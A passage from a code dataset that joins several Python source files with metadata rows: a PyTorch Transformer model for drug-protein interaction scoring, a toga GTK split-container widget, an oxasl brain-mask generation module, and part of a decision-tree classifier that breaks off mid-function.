        super(Encoder_MultipleLayers, self).__init__()
        layer = encoder(hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
        # Deep-copy so each layer owns its parameters; note all layers start
        # from identical initial weights because they are copies of one layer.
        self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(n_layer)])

    def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
        """Run the stack and return the final hidden states.

        output_all_encoded_layers is kept only for interface compatibility;
        intermediate layer outputs are never collected or returned.
        """
        for layer_module in self.layer:
            hidden_states = layer_module(hidden_states, attention_mask)
        return hidden_states
| 42.596811 | 199 | 0.669144 | from __future__ import print_function
import torch
from torch import nn
import torch.utils.data as Data
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import collections
import math
import copy
torch.manual_seed(1)
np.random.seed(1)
class BIN_Interaction_Flat(nn.Sequential):
    """
    Drug/protein interaction scoring network.

    Each token sequence is embedded and encoded by its own Transformer stack;
    the two encodings are combined position-by-position into an interaction
    map, which is reduced, passed through a small CNN and an MLP decoder that
    emits a single interaction score per sample.
    """
    def __init__(self, **config):
        super(BIN_Interaction_Flat, self).__init__()
        # Padded sequence lengths for the drug and protein token streams.
        self.max_d = config['max_drug_seq']
        self.max_p = config['max_protein_seq']
        self.emb_size = config['emb_size']
        self.dropout_rate = config['dropout_rate']
        # DenseNet-style settings read from the config; not used by this class.
        self.scale_down_ratio = config['scale_down_ratio']
        self.growth_rate = config['growth_rate']
        self.transition_rate = config['transition_rate']
        self.num_dense_blocks = config['num_dense_blocks']
        self.kernal_dense_size = config['kernal_dense_size']
        self.batch_size = config['batch_size']
        # Vocabulary sizes for the two token streams.
        self.input_dim_drug = config['input_dim_drug']
        self.input_dim_target = config['input_dim_target']
        self.gpus = torch.cuda.device_count()
        # Depth of each encoder stack.
        self.n_layer = 2
        self.hidden_size = config['emb_size']
        self.intermediate_size = config['intermediate_size']
        self.num_attention_heads = config['num_attention_heads']
        self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
        self.hidden_dropout_prob = config['hidden_dropout_prob']
        # Input width of the MLP decoder after the CNN output is flattened.
        self.flatten_dim = config['flat_dim']
        # Separate embedding tables and Transformer encoders per modality.
        self.demb = Embeddings(self.input_dim_drug, self.emb_size, self.max_d, self.dropout_rate)
        self.pemb = Embeddings(self.input_dim_target, self.emb_size, self.max_p, self.dropout_rate)
        self.d_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
        self.p_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
        # 2-D CNN over the (max_d, max_p) interaction map, then MLP to a score.
        self.icnn = nn.Conv2d(1, 3, 3, padding = 0)
        self.decoder = nn.Sequential(
            nn.Linear(self.flatten_dim, 512),
            nn.ReLU(True),
            nn.BatchNorm1d(512),
            nn.Linear(512, 64),
            nn.ReLU(True),
            nn.BatchNorm1d(64),
            nn.Linear(64, 32),
            nn.ReLU(True),
            nn.Linear(32, 1)
        )
    def forward(self, d, p, d_mask, p_mask):
        """Score a batch of (drug tokens, protein tokens) given 0/1 padding masks."""
        # Turn 0/1 keep-masks into additive attention masks: 0 for real
        # tokens, -10000 for padding, broadcastable to (batch, heads, q, k).
        ex_d_mask = d_mask.unsqueeze(1).unsqueeze(2)
        ex_p_mask = p_mask.unsqueeze(1).unsqueeze(2)
        ex_d_mask = (1.0 - ex_d_mask) * -10000.0
        ex_p_mask = (1.0 - ex_p_mask) * -10000.0
        d_emb = self.demb(d)
        p_emb = self.pemb(p)
        d_encoded_layers = self.d_encoder(d_emb.float(), ex_d_mask.float())
        p_encoded_layers = self.p_encoder(p_emb.float(), ex_p_mask.float())
        # NOTE(review): the prints throughout forward() look like debug leftovers.
        print("Drug encoded Layers shape: ", d_encoded_layers.shape)
        print("Protein encoded Layers shape: ", p_encoded_layers.shape)
        # Broadcast both encodings to (batch, max_d, max_p, emb) so every drug
        # position is paired with every protein position.
        d_aug = torch.unsqueeze(d_encoded_layers, 2).repeat(1, 1, self.max_p, 1)
        p_aug = torch.unsqueeze(p_encoded_layers, 1).repeat(1, self.max_d, 1, 1)
        print("Reshaped drug encoding shape: ", d_aug.shape)
        print("Reshaped protein encoding shape: ", p_aug.shape)
        # Element-wise product forms the pairwise interaction tensor.
        i = d_aug * p_aug
        print("Interaction shape: ", i.shape)
        # NOTE(review): view() reshapes without transposing, so the axis summed
        # below is a folded layout axis, not literally the embedding axis of
        # the (batch, max_d, max_p, emb) tensor — confirm this is intended.
        i_v = i.view(self.batch_size, -1, self.max_d, self.max_p)
        print(i_v.shape)
        i_v = torch.sum(i_v, dim = 1)
        print(i_v.shape)
        # Add a singleton channel dim for the Conv2d.
        i_v = torch.unsqueeze(i_v, 1)
        print(i_v.shape)
        i_v = F.dropout(i_v, p = self.dropout_rate)
        f = self.icnn(i_v)
        # Flatten CNN features and decode to one score per sample.
        f = f.view(self.batch_size, -1)
        score = self.decoder(f)
        return score
class Single_Transformer_Embedding(nn.Sequential):
    """
    Single-stream Transformer embedder.

    Tokens are embedded (token + position), encoded by a small Transformer
    stack with a null attention mask, and projected back onto the vocabulary,
    yielding per-token logits of shape (batch, seq, vocab_size).
    """
    def __init__(self, **config):
        super(Single_Transformer_Embedding, self).__init__()
        self.max_len = config["max_len"]
        self.emb_size = config["emb_size"]
        self.dropout_rate = config["dropout_rate"]
        self.batch_size = config["batch_size"]
        # Input vocabulary size for the embedding table.
        self.input_dim = config["input_dim"]
        self.gpus = torch.cuda.device_count()
        # Depth of the encoder stack.
        self.n_layer = 2
        self.hidden_size = config["emb_size"]
        self.intermediate_size = config["intermediate_size"]
        self.num_attention_heads = config["num_attention_heads"]
        self.attention_dropout = config["attention_probs_dropout_prob"]
        self.hidden_dropout = config["hidden_dropout_prob"]
        # Output vocabulary size for the projection head.
        self.vocab_size = config['vocab_size']
        self.flatten_dim = config["flat_dim"]
        self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
        self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_dropout, self.hidden_dropout)
        self.decoder = nn.Sequential(
            nn.Linear(self.hidden_size, self.vocab_size)
        )
    def forward(self, x):
        """Return per-token vocabulary logits for a (batch, seq) id tensor."""
        emb = self.emb(x)
        # A scalar 0. additive mask means no positions are masked out.
        # (The previous dead local `ex_mask = 0. * x` was never used - removed.)
        encoded_layers = self.encoder(emb.float(), 0.)
        embedding = self.decoder(encoded_layers)
        return embedding
class BIN_Transformer_Single(nn.Sequential):
    """
    Single-sequence Transformer classifier.

    A token sequence is embedded, encoded, flattened to (batch, flat_dim) and
    scored by an MLP decoder that emits one value per sample.
    """
    def __init__(self, **config):
        super(BIN_Transformer_Single, self).__init__()
        self.max_d = config['max_drug_seq']
        self.max_p = config['max_protein_seq']
        self.max_len = config['max_len']
        self.emb_size = config['emb_size']
        self.dropout_rate = config['dropout_rate']
        # DenseNet-style settings read from the config; not used by this class.
        self.scale_down_ratio = config['scale_down_ratio']
        self.growth_rate = config['growth_rate']
        self.transition_rate = config['transition_rate']
        self.num_dense_blocks = config['num_dense_blocks']
        self.kernal_dense_size = config['kernal_dense_size']
        self.batch_size = config['batch_size']
        self.input_dim = config['input_dim']
        self.gpus = torch.cuda.device_count()
        # Depth of the encoder stack.
        self.n_layer = 2
        self.hidden_size = config['emb_size']
        self.intermediate_size = config['intermediate_size']
        self.num_attention_heads = config['num_attention_heads']
        self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
        self.hidden_dropout_prob = config['hidden_dropout_prob']
        self.vocab_size = config['vocab_size']
        # Expected width of the flattened encoder output fed to the decoder.
        self.flatten_dim = config['flat_dim']
        self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
        self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
        self.decoder = nn.Sequential(
            nn.Linear(self.flatten_dim, 512),
            nn.ReLU(True),
            nn.BatchNorm1d(512),
            nn.Linear(512, 64),
            nn.ReLU(True),
            nn.BatchNorm1d(64),
            nn.Linear(64, 32),
            nn.ReLU(True),
            nn.Linear(32, 1)
        )
    def forward(self, x, mask):
        """Score a (batch, seq) token tensor given its 0/1 padding mask."""
        # Convert the 0/1 keep-mask into an additive attention mask.
        ex_mask = mask.unsqueeze(1).unsqueeze(2)
        ex_mask = (1.0 - ex_mask) * -10000.0
        emb = self.emb(x)
        encoded_layers = self.encoder(emb.float(), ex_mask.float())
        print("Encoder dim: ", encoded_layers.shape)
        layers = encoded_layers.view(self.batch_size, -1)
        # BUG FIX: the decoder's first Linear expects the flattened
        # (batch, flat_dim) tensor.  Previously the un-flattened
        # `encoded_layers` was passed and `layers` was never used.
        score = self.decoder(layers)
        return score
class LayerNorm(nn.Module):
    """Layer normalisation over the last dimension with learnable affine
    parameters (TensorFlow-style gamma/beta naming)."""
    def __init__(self, hidden_size, variance_epsilon=1e-12):
        super(LayerNorm, self).__init__()
        self.gamma = nn.Parameter(torch.ones(hidden_size))
        self.beta = nn.Parameter(torch.zeros(hidden_size))
        self.variance_epsilon = variance_epsilon
    def forward(self, x):
        """Normalise `x` along its last axis and apply gamma/beta."""
        mean = x.mean(-1, keepdim=True)
        centered = x - mean
        variance = centered.pow(2).mean(-1, keepdim=True)
        normalised = centered / torch.sqrt(variance + self.variance_epsilon)
        return self.gamma * normalised + self.beta
class Embeddings(nn.Module):
    """Token + learned positional embeddings followed by LayerNorm and dropout."""
    def __init__(self, vocab_size, hidden_size, max_position_size, dropout_rate):
        super(Embeddings, self).__init__()
        self.word_embeddings = nn.Embedding(vocab_size, hidden_size)
        self.position_embeddings = nn.Embedding(max_position_size, hidden_size)
        self.LayerNorm = LayerNorm(hidden_size)
        self.dropout = nn.Dropout(dropout_rate)
    def forward(self, input_ids):
        """Embed a (batch, seq) tensor of token ids into (batch, seq, hidden)."""
        positions = torch.arange(input_ids.size(1), dtype=torch.long,
                                 device=input_ids.device)
        positions = positions.unsqueeze(0).expand_as(input_ids)
        summed = self.word_embeddings(input_ids) + self.position_embeddings(positions)
        return self.dropout(self.LayerNorm(summed))
class SelfAttention(nn.Module):
    """Standard multi-head scaled dot-product self-attention."""
    def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob):
        super(SelfAttention, self).__init__()
        if hidden_size % num_attention_heads != 0:
            raise ValueError(
                "The hidden size (%d) is not a multiple of the number of attention "
                "heads (%d)" % (hidden_size, num_attention_heads))
        self.num_attention_heads = num_attention_heads
        self.attention_head_size = int(hidden_size / num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        self.query = nn.Linear(hidden_size, self.all_head_size)
        self.key = nn.Linear(hidden_size, self.all_head_size)
        self.value = nn.Linear(hidden_size, self.all_head_size)
        self.dropout = nn.Dropout(attention_probs_dropout_prob)
    def transpose_for_scores(self, x):
        """Reshape (..., seq, hidden) into (..., heads, seq, head_size)."""
        split_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        return x.view(*split_shape).permute(0, 2, 1, 3)
    def forward(self, hidden_states, attention_mask):
        """Attend over `hidden_states`; `attention_mask` is additive (0 / -10000)."""
        q = self.transpose_for_scores(self.query(hidden_states))
        k = self.transpose_for_scores(self.key(hidden_states))
        v = self.transpose_for_scores(self.value(hidden_states))
        # Scaled dot-product scores; the additive mask suppresses padded keys.
        scores = torch.matmul(q, k.transpose(-1, -2)) / math.sqrt(self.attention_head_size)
        scores = scores + attention_mask
        probs = self.dropout(nn.Softmax(dim=-1)(scores))
        # Merge heads back into a single hidden dimension.
        context = torch.matmul(probs, v).permute(0, 2, 1, 3).contiguous()
        merged_shape = context.size()[:-2] + (self.all_head_size,)
        return context.view(*merged_shape)
class SelfOutput(nn.Module):
    """Projection + dropout + residual LayerNorm applied after self-attention."""
    def __init__(self, hidden_size, hidden_dropout_prob):
        super(SelfOutput, self).__init__()
        self.dense = nn.Linear(hidden_size, hidden_size)
        self.LayerNorm = LayerNorm(hidden_size)
        self.dropout = nn.Dropout(hidden_dropout_prob)
    def forward(self, hidden_states, input_tensor):
        """Project the attention output and add the residual `input_tensor`."""
        projected = self.dropout(self.dense(hidden_states))
        return self.LayerNorm(projected + input_tensor)
class Attention(nn.Module):
    """Attention sub-layer: multi-head self-attention plus its output block."""
    def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
        super(Attention, self).__init__()
        self.self = SelfAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob)
        self.output = SelfOutput(hidden_size, hidden_dropout_prob)
    def forward(self, input_tensor, attention_mask):
        # The residual connection to `input_tensor` happens inside SelfOutput.
        return self.output(self.self(input_tensor, attention_mask), input_tensor)
class Intermediate(nn.Module):
    """Position-wise feed-forward expansion with ReLU activation."""
    def __init__(self, hidden_size, intermediate_size):
        super(Intermediate, self).__init__()
        self.dense = nn.Linear(hidden_size, intermediate_size)
    def forward(self, hidden_states):
        """Expand (..., hidden) to (..., intermediate) and apply ReLU."""
        return F.relu(self.dense(hidden_states))
class Output(nn.Module):
    """Feed-forward contraction with dropout and residual LayerNorm."""
    def __init__(self, intermediate_size, hidden_size, hidden_dropout_prob):
        super(Output, self).__init__()
        self.dense = nn.Linear(intermediate_size, hidden_size)
        self.LayerNorm = LayerNorm(hidden_size)
        self.dropout = nn.Dropout(hidden_dropout_prob)
    def forward(self, hidden_states, input_tensor):
        """Contract back to hidden size and add the residual `input_tensor`."""
        contracted = self.dropout(self.dense(hidden_states))
        return self.LayerNorm(contracted + input_tensor)
class Encoder(nn.Module):
    """One Transformer encoder layer: attention sub-layer then feed-forward."""
    def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
        super(Encoder, self).__init__()
        self.attention = Attention(hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
        self.intermediate = Intermediate(hidden_size, intermediate_size)
        self.output = Output(intermediate_size, hidden_size, hidden_dropout_prob)
    def forward(self, hidden_states, attention_mask):
        attended = self.attention(hidden_states, attention_mask)
        # Feed-forward with residual back onto the attention output.
        return self.output(self.intermediate(attended), attended)
class LinearEncoder(nn.Module):
    """Encoder layer variant wrapping a linear-complexity multi-head attention.

    `intermediate_size` is accepted only for signature parity with Encoder.
    """
    def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_dropout, hidden_dropout):
        super(LinearEncoder, self).__init__()
        head_size = int(hidden_size / num_attention_heads)
        self.attention = LinearMultiHeadAttn(num_attention_heads, hidden_size, head_size, hidden_dropout, attention_dropout)
    def forward(self, hidden_states, attention_mask):
        return self.attention(hidden_states, attention_mask)
class Encoder_MultipleLayers(nn.Module):
    """
    Stack of identical encoder layers.

    `encoder` is a layer class/factory called as
    ``encoder(hidden_size, intermediate_size, num_attention_heads,
    attention_probs_dropout_prob, hidden_dropout_prob)``; the stack holds
    `n_layer` independent deep copies of one instance.
    """
    def __init__(self, encoder, n_layer, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
        super(Encoder_MultipleLayers, self).__init__()
        layer = encoder(hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
        # Deep copies so each layer owns its own parameters.
        self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(n_layer)])
    def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
        """Run the input through every layer and return the final hidden states.

        `output_all_encoded_layers` is kept for API compatibility only; just
        the last layer's output is returned.  (The previous dead local
        `all_encoder_layers` was removed.)
        """
        for layer_module in self.layer:
            hidden_states = layer_module(hidden_states, attention_mask)
        return hidden_states
| true | true |
f73265c9edaae6ec1281e7f5b9116e4c14930790 | 3,488 | py | Python | oxasl/mask.py | ibme-qubic/oxasl | 8a0c055752d6e10cd932336ae6916f0c4fc0a2e9 | [
"Apache-2.0"
] | 1 | 2020-11-02T13:01:47.000Z | 2020-11-02T13:01:47.000Z | oxasl/mask.py | ibme-qubic/oxasl | 8a0c055752d6e10cd932336ae6916f0c4fc0a2e9 | [
"Apache-2.0"
] | 13 | 2019-01-14T13:22:00.000Z | 2020-09-12T20:34:20.000Z | oxasl/mask.py | physimals/oxasl | e583103f3313aed2890b60190b6ca7b265a46e3c | [
"Apache-2.0"
] | 3 | 2019-03-19T15:46:48.000Z | 2020-03-13T16:55:48.000Z | """
OXASL - Module to generate a suitable mask for ASL data
Copyright (c) 2008-2020 Univerisity of Oxford
"""
import numpy as np
import scipy as sp
import fsl.wrappers as fsl
from fsl.data.image import Image
from oxasl import reg
from oxasl.reporting import LightboxImage
def generate_mask(wsp):
    """
    Backwards-compatible entry point kept for older callers; delegates
    straight to :func:`run`.
    """
    run(wsp)
def run(wsp):
    """
    Generate mask for ASL data

    - If a ready-made mask image is provided or has already been generated, this is returned
    - If a structural image is provided this will be used. Brain extraction and registration
      will be performed if required
    - If a calibration image is provided, this is used. It is assumed to be in the same space
      as the ASL data
    - If none of the above are present, the ASL data itself is averaged and brain extracted
      to produce the mask

    Required workspace attributes
    -----------------------------

    Formally there are no required attributes, however at least one image must be provided
    which enables a mask to be generated.

    Optional workspace attributes
    -----------------------------

     - ``asldata`` : ASL data image
     - ``mask``    : Existing brain mask
     - ``struc``   : Structural image (wholehead)
     - ``struc_brain``: Already brain-extracted structural image
     - ``asl2struc`` : Existring ASL->Structural space transformation matrix
     - ``calib``   : Calibration image
     - ``nativeref`` : ASL registration source image
    """
    # Nothing to do if a mask was already generated on this workspace.
    if wsp.rois is not None and wsp.rois.mask is not None:
        return

    wsp.sub("rois")
    wsp.log.write("\nGenerating ASL data mask\n")

    # Reporting
    page = wsp.report.page("mask")
    page.heading("Mask generation", level=0)

    if wsp.mask is not None:
        wsp.rois.mask_src = "user"
        mask_source = "provided by user (assumed to be ASL space): %s" % wsp.mask.name
        wsp.rois.mask = wsp.mask
    elif wsp.structural is not None and wsp.structural.struc is not None:
        # Preferred option is to use brain extracted structural
        wsp.rois.mask_src = "struc"
        page.heading("Brain extracted structural image", level=1)
        page.image("struc_brain", LightboxImage(wsp.structural.brain, bgimage=wsp.structural.struc))
        wsp.rois.mask_struc = wsp.structural.brain_mask
        wsp.rois.mask_asl = reg.change_space(wsp, wsp.structural.brain_mask, "native")
        # Threshold the resampled mask and fill interior holes.  The builtin
        # int and sp.ndimage.binary_fill_holes replace the removed np.int
        # alias (NumPy >= 1.24) and the deprecated scipy.ndimage.morphology
        # namespace respectively.
        wsp.rois.mask = Image(sp.ndimage.binary_fill_holes((wsp.rois.mask_asl.data > 0.25)).astype(int), header=wsp.rois.mask_asl.header)
        mask_source = "generated from brain extracting structural image and registering to ASL space"
    else:
        # Alternatively, use registration image (which will be BETed calibration or mean ASL image)
        wsp.rois.mask_src = "nativeref"
        wsp.rois.mask = Image((wsp.reg.nativeref.data != 0).astype(int), header=wsp.reg.nativeref.header)
        mask_source = "generated from brain extracted registration ASL image"

    wsp.log.write(" - Mask %s\n" % mask_source)

    page.heading("Masked ASL brain image", level=1)
    page.text("Mask was %s" % mask_source)
    page.text("PW ASL image masked by ASL-space mask")

    if wsp.asldata.iaf in ("diff", "tc", "ct"):
        page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.perf_weighted(), outline=True))
    else:
        page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.mean(), outline=True))
| 39.191011 | 151 | 0.675745 | import numpy as np
import scipy as sp
import fsl.wrappers as fsl
from fsl.data.image import Image
from oxasl import reg
from oxasl.reporting import LightboxImage
def generate_mask(wsp):
    """Backwards-compatible alias that delegates to run()."""
    run(wsp)
def run(wsp):
    """
    Generate the ASL-space brain mask for the workspace.

    Preference order: a user-supplied mask, a brain-extracted structural
    image registered into ASL space, then the native registration reference
    image.  The result is stored on ``wsp.rois.mask`` and documented in the
    workspace report.
    """
    # Nothing to do if a mask was already generated on this workspace.
    if wsp.rois is not None and wsp.rois.mask is not None:
        return
    wsp.sub("rois")
    wsp.log.write("\nGenerating ASL data mask\n")
    page = wsp.report.page("mask")
    page.heading("Mask generation", level=0)
    if wsp.mask is not None:
        wsp.rois.mask_src = "user"
        mask_source = "provided by user (assumed to be ASL space): %s" % wsp.mask.name
        wsp.rois.mask = wsp.mask
    elif wsp.structural is not None and wsp.structural.struc is not None:
        # Preferred: brain-extracted structural registered to ASL space.
        wsp.rois.mask_src = "struc"
        page.heading("Brain extracted structural image", level=1)
        page.image("struc_brain", LightboxImage(wsp.structural.brain, bgimage=wsp.structural.struc))
        wsp.rois.mask_struc = wsp.structural.brain_mask
        wsp.rois.mask_asl = reg.change_space(wsp, wsp.structural.brain_mask, "native")
        # int and sp.ndimage.binary_fill_holes replace the removed np.int
        # alias (NumPy >= 1.24) and the deprecated scipy.ndimage.morphology
        # namespace respectively.
        wsp.rois.mask = Image(sp.ndimage.binary_fill_holes((wsp.rois.mask_asl.data > 0.25)).astype(int), header=wsp.rois.mask_asl.header)
        mask_source = "generated from brain extracting structural image and registering to ASL space"
    else:
        # Fall back to the (already brain-extracted) registration reference.
        wsp.rois.mask_src = "nativeref"
        wsp.rois.mask = Image((wsp.reg.nativeref.data != 0).astype(int), header=wsp.reg.nativeref.header)
        mask_source = "generated from brain extracted registration ASL image"
    wsp.log.write(" - Mask %s\n" % mask_source)
    page.heading("Masked ASL brain image", level=1)
    page.text("Mask was %s" % mask_source)
    page.text("PW ASL image masked by ASL-space mask")
    if wsp.asldata.iaf in ("diff", "tc", "ct"):
        page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.perf_weighted(), outline=True))
    else:
        page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.mean(), outline=True))
| true | true |
f7326634ece2f34cc1465b450f8505c188b6eaa4 | 1,769 | py | Python | src/gtk/toga_gtk/widgets/splitcontainer.py | saluk/toga | f8bea583c87642ad102776e1b58fd8bb9265b135 | [
"BSD-3-Clause"
] | null | null | null | src/gtk/toga_gtk/widgets/splitcontainer.py | saluk/toga | f8bea583c87642ad102776e1b58fd8bb9265b135 | [
"BSD-3-Clause"
] | null | null | null | src/gtk/toga_gtk/widgets/splitcontainer.py | saluk/toga | f8bea583c87642ad102776e1b58fd8bb9265b135 | [
"BSD-3-Clause"
] | null | null | null | from ..libs import Gtk
from ..window import GtkViewport
from .base import Widget
class SplitContainer(Widget):
    """GTK backend for toga's SplitContainer, built on Gtk.Paned."""
    def create(self):
        # Gtk.Paned supersedes the deprecated VPaned/HPaned widgets.  Toga's
        # orientation is the transpose of GTK's, hence the swap below.
        if self.interface.VERTICAL:
            orientation = Gtk.Orientation.HORIZONTAL
        elif self.interface.HORIZONTAL:
            orientation = Gtk.Orientation.VERTICAL
        else:
            raise ValueError("Allowed orientation is VERTICAL or HORIZONTAL")
        self.native = Gtk.Paned.new(orientation)
        self.native.interface = self.interface
        self.ratio = None
    def add_content(self, position, widget, flex):
        """Pack `widget` into pane `position` (0 = first, 1 = second)."""
        widget.viewport = GtkViewport(self.native)
        # Re-parent every child of the incoming widget onto the new container.
        for child in widget.interface.children:
            child._impl.container = widget
        if position >= 2:
            raise ValueError('SplitContainer content must be a 2-tuple')
        if position == 0:
            self.native.set_wide_handle(True)
            self.native.pack1(widget.native, flex, False)
        elif position == 1:
            self.native.set_wide_handle(True)
            self.native.pack2(widget.native, flex, False)
    def set_app(self, app):
        # Propagate the app reference to both panes, if content is assigned.
        if not self.interface.content:
            return
        self.interface.content[0].app = self.interface.app
        self.interface.content[1].app = self.interface.app
    def set_window(self, window):
        # Propagate the window reference to both panes, if content is assigned.
        if not self.interface.content:
            return
        self.interface.content[0].window = self.interface.window
        self.interface.content[1].window = self.interface.window
    def set_direction(self, value):
        self.interface.factory.not_implemented('SplitContainer.set_direction()')
| 36.102041 | 80 | 0.654607 | from ..libs import Gtk
from ..window import GtkViewport
from .base import Widget
class SplitContainer(Widget):
    """GTK implementation of a two-pane split container (Gtk.Paned)."""
    def create(self):
        # toga's orientation maps to the opposite GTK orientation.
        if self.interface.VERTICAL:
            self.native = Gtk.Paned.new(Gtk.Orientation.HORIZONTAL)
        elif self.interface.HORIZONTAL:
            self.native = Gtk.Paned.new(Gtk.Orientation.VERTICAL)
        else:
            raise ValueError("Allowed orientation is VERTICAL or HORIZONTAL")
        self.native.interface = self.interface
        self.ratio = None
    def add_content(self, position, widget, flex):
        """Pack `widget` into pane `position` (0 = first, 1 = second)."""
        widget.viewport = GtkViewport(self.native)
        # Attach each child of the incoming widget to its new container.
        for child in widget.interface.children:
            child._impl.container = widget
        if position >= 2:
            raise ValueError('SplitContainer content must be a 2-tuple')
        if position == 0:
            self.native.set_wide_handle(True)
            self.native.pack1(widget.native, flex, False)
        elif position == 1:
            self.native.set_wide_handle(True)
            self.native.pack2(widget.native, flex, False)
    def set_app(self, app):
        # Propagate the app reference to both panes.
        if self.interface.content:
            self.interface.content[0].app = self.interface.app
            self.interface.content[1].app = self.interface.app
    def set_window(self, window):
        # Propagate the window reference to both panes.
        if self.interface.content:
            self.interface.content[0].window = self.interface.window
            self.interface.content[1].window = self.interface.window
    def set_direction(self, value):
        self.interface.factory.not_implemented('SplitContainer.set_direction()')
| true | true |
f732667678fe56d63a50d6cdfc0a2bcc6b9ff02f | 5,812 | py | Python | lh/DecisionTree2.py | skyf0cker/Statistical_learning_method | 8151f3b8595ac086f08d161dc0cb961946f4b7fc | [
"MIT"
] | 3 | 2019-03-25T14:15:30.000Z | 2019-08-29T15:02:47.000Z | lh/DecisionTree2.py | skyf0cker/Statistical_learning_method | 8151f3b8595ac086f08d161dc0cb961946f4b7fc | [
"MIT"
] | null | null | null | lh/DecisionTree2.py | skyf0cker/Statistical_learning_method | 8151f3b8595ac086f08d161dc0cb961946f4b7fc | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-02-03 15:17:08
# @Author : Vophan Lee (vophanlee@gmail.com)
# @Link : https://www.jianshu.com/u/3e6114e983ad
from sklearn.datasets import make_classification
import numpy as np
import math
class Decision_Tree(object):
    """
    Builds a binary decision tree over a synthetic sklearn classification
    dataset by choosing, per feature, the split point with maximum
    information gain.
    """
    # Class-level state shared across instances: per-feature best split
    # values, their information gains, the feature (dimension) order, and a
    # cursor used while growing the tree.
    feature_list = []
    gain_list = []
    dim_list = []
    index = 0
    def __init__(self):
        super(Decision_Tree, self).__init__()
        # 100 samples x 5 continuous features, 2 classes.
        self.features = 5
        self.samples = 100
        self.data = make_classification(
            n_samples=self.samples, n_features=self.features, n_classes=2)
        self.empirical_entropy = self.cal_emp_entropy(self.data)
    def cal_emp_entropy(self, data):
        """
        Calculate the empirical entropy of `data`, a (samples, labels) pair
        where labels are 0/1.
        """
        data_0 = []
        data_1 = []
        # Partition the samples by their 0/1 label.
        for i in enumerate(data[1]):
            if i[1] == 0:
                data_0.append(data[0][i[0]])
            else:
                data_1.append(data[0][i[0]])
        entropy = 0
        # FIXME(review): if either class is empty this evaluates log2(0) and
        # raises; an empty partition should contribute zero entropy.
        for data_ in [data_0, data_1]:
            entropy += - \
                (len(data_) / len(data[0])) * \
                math.log2(len(data_) / len(data[0]))
        return entropy
    def div_point(self, dim_data):
        """
        Decide the dividing point for one feature; `dim_data` is a
        (labels, feature_values) tuple for a continuous feature.
        Returns (best_information_gain, split_value); a gain of -1 signals
        the early-exit case where the first half is homogeneous.
        """
        def dichotomy(dim_data):
            # Candidate split points: midpoints of consecutive values.
            div_points = np.zeros((1, self.samples)).reshape(self.samples)
            for i in enumerate(dim_data):
                if i[0] == len(dim_data) - 1:
                    break
                div_points[i[0]] = (dim_data[i[0] + 1] + i[1]) / 2
            return div_points
        dim_data = list(dim_data)
        dim_data = np.array(dim_data)
        # FIXME(review): this sorts the columns by dim_data[0] (the labels),
        # while midpoint candidates below assume dim_data[1] (the feature
        # values) is sorted - confirm whether argsort should use dim_data[1].
        dim_data = dim_data[:, dim_data[0].argsort()]
        dim_data = tuple(dim_data)
        div_points = dichotomy(dim_data[1])
        information_gain_list = []
        for i in div_points:
            # NOTE(review): index() finds the first occurrence, so duplicate
            # midpoint values all map to the same split index.
            div_index = list(div_points).index(i) + 1
            front = dim_data[1][:div_index]
            behind = dim_data[1][div_index:]
            front_flag = dim_data[0][:div_index]
            behind_flag = dim_data[0][div_index:]
            front_data = (front, front_flag)
            behind_data = (behind, behind_flag)
            # A comparison with the reversed flag array being all-equal means
            # the partition's labels are homogeneous (all identical).
            if len(front_data[0]) == 1 or ((front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
                behind_entropy = self.cal_emp_entropy(behind_data)
                information_gain = self.empirical_entropy - \
                    (behind_entropy * (len(behind) / len(dim_data[0])))
                information_gain_list.append(information_gain)
            elif len(behind_data[0]) == 1 or ((behind_data[1] == behind_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
                front_entropy = self.cal_emp_entropy(front_data)
                information_gain = self.empirical_entropy - \
                    (front_entropy * (len(front) / len(dim_data[0])))
                information_gain_list.append(information_gain)
            elif (front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) == len(dim_data[0]) / 2:
                # Homogeneous first half at the exact midpoint: signal with -1.
                return -1, div_points[int(len(dim_data[0]) / 2 - 1)]
            else:
                front_entropy = self.cal_emp_entropy(front_data)
                behind_entropy = self.cal_emp_entropy(behind_data)
